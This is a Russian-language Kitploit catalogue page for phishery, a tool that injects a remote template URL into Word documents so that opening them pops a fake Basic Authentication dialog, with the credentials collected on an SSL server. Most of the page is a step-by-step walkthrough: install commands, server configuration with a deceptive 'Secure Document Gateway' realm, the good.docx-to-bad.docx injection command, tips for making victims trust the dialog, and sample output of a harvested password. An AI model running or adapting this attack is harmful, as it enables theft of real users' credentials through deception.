Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
phishery — Сборщик учётных данных с базовой аутентификацией, поддерживающий SSL, и инжектор URL-адресов шаблонов документов Word | Kitploit
Инструменты/GitHubGitHub/ryhanson/phishery
Инструменты фишингаФишингВеб-безопасностьСоциальная инженерия
GitHubryhanson/phishery

phishery

Сборщик учётных данных с базовой аутентификацией, поддерживающий SSL, и инжектор URL-адресов шаблонов документов Word

Репозиторий
1.0k20249 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

phishery

Phishery — это простой HTTP-сервер с поддержкой SSL, основное назначение которого — фишинг учётных данных через базовую аутентификацию (Basic Authentication). Phishery также позволяет легко внедрять URL в документ .docx Word.

Диалог базовой аутентификации в Word

Мощь phishery лучше всего демонстрируется при установке шаблона документа Word на URL phishery. Это заставляет Microsoft Word отправить запрос к URL, в результате чего конечному пользователю отображается диалог аутентификации. Возможность внедрения любого URL в файл .docx реализована с помощью опций phishery -i [входной docx], -o [выходной docx] и -u [url].

Загрузка

Пакеты для конкретных операционных систем можно скачать отсюда.

Установка

Распакуйте архив и, при желании, установите бинарный файл в $PATH

root@kitploit:~
$ tar -xzvf phishery*.tar.gz
$ cd phishery*
$ cp phishery /usr/local/bin

Использование

root@kitploit:~
$ phishery --help

|\   \\\\__   O         __    _      __
| \_/    o \  o  ____  / /_  (_)____/ /_  ___  _______  __
> _   (( <_ oO  / __ \/ __ \/ / ___/ __ \/ _ \/ ___/ / / /
| / \__+___/   / /_/ / / / / (__  ) / / /  __/ /  / /_/ /
|/     |/     / .___/_/ /_/_/____/_/ /_/\___/_/   \__, /
             /_/ Сборщик учётных данных через Basic Auth (____/
                 с внедрением шаблона Word-документа

  Запуск сервера     : phishery -s settings.json -c credentials.json
  Внедрение шаблона  : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx

  Опции:
    -h, --help      Показать справку и выйти.
    -v              Показать версию и выйти.
    -s              JSON-файл настроек для запуска сервера. [по умолчанию: "settings.json"]
    -c              JSON-файл для хранения собранных учётных данных. [по умолчанию: "credentials.json"]
    -u              URL phishery, который будет использоваться как шаблон документа Word.
    -i              Файл Word .docx для внедрения URL-шаблона.
    -o              Новый файл Word .docx с внедрённым URL-шаблоном.
Запуск сервера

При необходимости измените предоставленный файл settings.json; по умолчанию он должен выглядеть так:

root@kitploit:~
{
  "ip": "0.0.0.0",
  "port": "443",
  "sslCert": "server.crt",
  "sslKey": "server.key",
  "basicRealm": "Secure Document Gateway",
  "responseStatus": 200,
  "responseFile": "template.dotx",
  "responseHeaders": [
    ["Content-Type", "application/vnd.openxmlformats-officedocument.wordprocessingml.template"]
  ]
}

Эта настройка запускает HTTP-сервер на порту 443 с SSL, настроенным на использование server.crt и server.key. Область базовой аутентификации установлена как Secure Document Gateway. При вводе любых учётных данных отправляется статус ответа 200 вместе с содержимым прилагаемого файла template.dotx и заголовком Content-Type: Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.template.

Файл настроек также может быть настроен на вывод простого тела ответа с помощью responseBody, например:

root@kitploit:~
{
  "ip": "0.0.0.0",
  "port": "443",
  "sslCert": "server.crt",
  "sslKey": "server.key",
  "basicRealm": "Secure Document Gateway",
  "responseStatus": 404,
  "responseBody": "<h1>Not Found</h1>",
  "responseHeaders": [
    ["Content-Type", "text/html"]
  ]
}

Эффективность этого инструмента во многом зависит от используемых домена и области Basic Auth, так как именно это чаще всего видит конечный пользователь при запуске из документа Office. Убедитесь, что ваши DNS A-записи указывают на публичный IP сервера phishery.

Рекомендуется заменить предоставленный сертификат на доверенный, например сгенерированный с помощью LetsEncrypt. Microsoft Word на OS X будет блокировать диалог аутентификации, если сертификат недействителен, а Microsoft Word на Windows предложит пользователю принять недействительный сертификат.

После настройки и запуска сервера всё, что вам нужно сделать, — это внедрить URL phishery в документ или в любое другое место по вашему желанию. phishery предоставляет возможность внедрить ваш URL в документ Word в качестве шаблона; инструкции по этому поводу приведены ниже.

Внедрение в документ Word

Чтобы внедрить URL-шаблон в документ Word, вам понадобится файл .docx и URL сервера phishery.

Теперь запустите phishery с вашим документом и URL:

root@kitploit:~
$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
[+] Открытие документа Word: good.docx
[+] Установка шаблона документа Word: https://secure.site.local/docs
[+] Сохранение внедрённого документа Word: bad.docx
[+] Внедрённый документ Word сохранён!

Убедитесь, что ваш сервер phishery запущен и доступен по указанному URL. Теперь, когда документ Word будет открыт, жертве будет предложен диалог аутентификации.

Когда жертва откроет документ, вы увидите следующее:

root@kitploit:~
$ ./phishery
[+] Хранилище учётных данных инициализировано: credentials.json
[+] Запуск HTTPS Auth-сервера на: 0.0.0.0:443
[*] Получен запрос 2016-09-25 01:06:28: HEAD https://secure.site.local/docs
[*] Отправка ответа Basic Auth на: 127.0.0.1
[*] Новые учётные данные собраны!
[HTTP] Хост        : secure.example.local
[HTTP] Запрос      : /docs
[HTTP] User Agent  : Microsoft Office Word
[HTTP] IP-адрес    : 127.0.0.1
[AUTH] Имя         : john.doe
[AUTH] Пароль      : Summer15
Скачать инструмент